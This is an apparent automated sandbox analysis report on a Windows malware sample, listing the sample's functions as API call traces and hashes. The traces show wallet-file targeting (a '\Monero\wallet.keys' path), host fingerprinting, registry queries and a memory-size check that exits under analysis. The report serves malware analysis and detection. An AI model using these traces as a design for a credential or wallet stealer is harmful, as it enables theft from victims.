Part of subcall function 00266770: GetUserDefaultLangID.KERNEL32 ref: 00266774

Part of subcall function 00251190: ExitProcess.KERNEL32 ref: 002511C6

Part of subcall function 00267850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002511B7), ref: 00267880
Part of subcall function 00267850: RtlAllocateHeap.NTDLL(00000000), ref: 00267887
Part of subcall function 00267850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0026789F

Part of subcall function 002678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00267910
Part of subcall function 002678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00267917
Part of subcall function 002678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0026792F

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D491A8,?,0027110C,?,00000000,?,00271110,?,00000000,00270AEF), ref: 00266ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00266AE8
CloseHandle.KERNEL32(00000000), ref: 00266AF9
Sleep.KERNEL32(00001770), ref: 00266B04
CloseHandle.KERNEL32(?,00000000,?,00D491A8,?,0027110C,?,00000000,?,00271110,?,00000000,00270AEF), ref: 00266B1A
ExitProcess.KERNEL32 ref: 00266B22

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 38bf54e3a3c3c4b1adc241b4ef3903065586d54b769abf17090189fe26c17a9c
Instruction ID: 6e4c7b41eb31b9c5a0e60d903125d0aa0d4a3541de6adf17579dad4cb863b4c2
Opcode Fuzzy Hash: 38bf54e3a3c3c4b1adc241b4ef3903065586d54b769abf17090189fe26c17a9c
Instruction Fuzzy Hash: 37310971930208AADB04FBF0DC57BEE7778AF14300F504529F612B6192DF7069A5CEA6

Function 002599C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002599EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00259A11
LocalAlloc.KERNEL32(00000040,?), ref: 00259A31
ReadFile.KERNEL32(000000FF,?,00000000,0025148F,00000000), ref: 00259A5A
LocalFree.KERNEL32(0025148F), ref: 00259A90
CloseHandle.KERNEL32(000000FF), ref: 00259A9A

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 39942ccf719f7f9dfdda03386325f78db6fd21fc7febb6ea16ab9657d826d55a
Instruction ID: d87a440ddc503fff9945b8b6b5b516d06308035b1685cff2b59daecd9f8baed5
Opcode Fuzzy Hash: 39942ccf719f7f9dfdda03386325f78db6fd21fc7febb6ea16ab9657d826d55a
Instruction Fuzzy Hash: 41316BB4A1020AEFDB14CF94C885BAE77B4FF48301F108168E801A7290C774AAA5CFA5

Function 00264780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00D4E4E8), ref: 002647DB

Part of subcall function 00268DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00268E0B

lstrcat.KERNEL32(?,00000000), ref: 00264801
lstrcat.KERNEL32(?,?), ref: 00264820
lstrcat.KERNEL32(?,?), ref: 00264834
lstrcat.KERNEL32(?,00D3BA90), ref: 00264847
lstrcat.KERNEL32(?,?), ref: 0026485B
lstrcat.KERNEL32(?,00D4D900), ref: 0026486F

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 00268D90: GetFileAttributesA.KERNEL32(00000000,?,00251B54,?,?,0027564C,?,?,00270E1F), ref: 00268D9F

Part of subcall function 00264570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00264580
Part of subcall function 00264570: RtlAllocateHeap.NTDLL(00000000), ref: 00264587
Part of subcall function 00264570: wsprintfA.USER32 ref: 002645A6
Part of subcall function 00264570: FindFirstFileA.KERNEL32(?,?), ref: 002645BD

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: e350549780998a7bae72e4863175038e2481b7f3c68591d0c126e9c31b9441fc
Instruction ID: 3daf1f62147cadd5a1270d18bb13833908256d4534e00c2d9c8bcedb40900f16
Opcode Fuzzy Hash: e350549780998a7bae72e4863175038e2481b7f3c68591d0c126e9c31b9441fc
Instruction Fuzzy Hash: F13193B291020867CF10FBB0DC85EED737CAB58700F4445A9B75996081EE7497D9CF95

Function 00251220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0025123E
__aulldiv.LIBCMT ref: 00251258
__aulldiv.LIBCMT ref: 00251266
ExitProcess.KERNEL32 ref: 00251294

Strings

@, xrefs: 00251233

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 2bb396a4a82d9331070689f71248b4c0a918280016eca8d03aeb71c4e03a9f11
Instruction ID: 7e7a1b5aa19ff6c37e230a54dc5aba03398a346099a20c3f090fc1852c3aa23c
Opcode Fuzzy Hash: 2bb396a4a82d9331070689f71248b4c0a918280016eca8d03aeb71c4e03a9f11
Instruction Fuzzy Hash: D30162B0D54308BADB10DFD0CC49B9EB778AB14706F208055EB05F62C0D77455A58B9D

Function 002640B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00D4D980,00000000,00020119,?), ref: 002640F4
RegQueryValueExA.ADVAPI32(?,00D4E608,00000000,00000000,00000000,000000FF), ref: 00264118
RegCloseKey.ADVAPI32(?), ref: 00264122
lstrcat.KERNEL32(?,00000000), ref: 00264147
lstrcat.KERNEL32(?,00D4E620), ref: 0026415B

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: c598eafa12f42c2e45ae9ebe6e4ec42126a944094976199a45eeb9277429e834
Instruction ID: 790523345318dd1eafe4d80d6070328cfc100739952487d3fcba209cd6478932
Opcode Fuzzy Hash: c598eafa12f42c2e45ae9ebe6e4ec42126a944094976199a45eeb9277429e834
Instruction Fuzzy Hash: 7D41C8B6D101086BDB14FBA0DC46FFE733DAB98300F404569B61557181EA755BAC8FE2

Function 6C5CC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C5CC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C5CC969
GetSystemInfo.KERNEL32(?), ref: 6C5CC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C5CC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C5CC9E2

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 521e40f3c221304fb68e2c08f60455501c6340eb9f9048cf3af22a27dec1f593
Instruction ID: 72fe32e5817c4cbfd6e76451623ac74a8a0f76cda22f8ef9992af1ee60b8d16b
Opcode Fuzzy Hash: 521e40f3c221304fb68e2c08f60455501c6340eb9f9048cf3af22a27dec1f593
Instruction Fuzzy Hash: 42213E31701618ABDB15AB65DCC8BAE73B9FB86340F50151DF90BA7780EB707C408796

Function 00267E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00267E37
RtlAllocateHeap.NTDLL(00000000), ref: 00267E3E
RegOpenKeyExA.KERNEL32(80000002,00D3BFA0,00000000,00020119,?), ref: 00267E5E
RegQueryValueExA.KERNEL32(?,00D4D7C0,00000000,00000000,000000FF,000000FF), ref: 00267E7F
RegCloseKey.ADVAPI32(?), ref: 00267E92

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 9c9a4ef77f6b5a53a5929328e57b3f880bce4727e16ef389990414605f312372
Instruction ID: a98b8933e1103cc5108e6453a2bbefe054a46b1067ca734446b50f4e4587d9c1
Opcode Fuzzy Hash: 9c9a4ef77f6b5a53a5929328e57b3f880bce4727e16ef389990414605f312372
Instruction Fuzzy Hash: EE119EB1A54209EBD700DFD4ED4AFBBBBB8EB04B04F10417AFA05A7280D7B558148BE1

Function 002512A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 002512B4
RtlAllocateHeap.NTDLL(00000000), ref: 002512BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 002512D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002512F5
RegCloseKey.ADVAPI32(?), ref: 002512FF

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 00793e51c56799683e8c37072e56c1ec89c0f4ec1d88db9ab856a2702ba089f9
Instruction ID: be2c955d3a5f876cb033e7e3ef936853b3d51c5b42ebda890866c9c74abc4c73
Opcode Fuzzy Hash: 00793e51c56799683e8c37072e56c1ec89c0f4ec1d88db9ab856a2702ba089f9
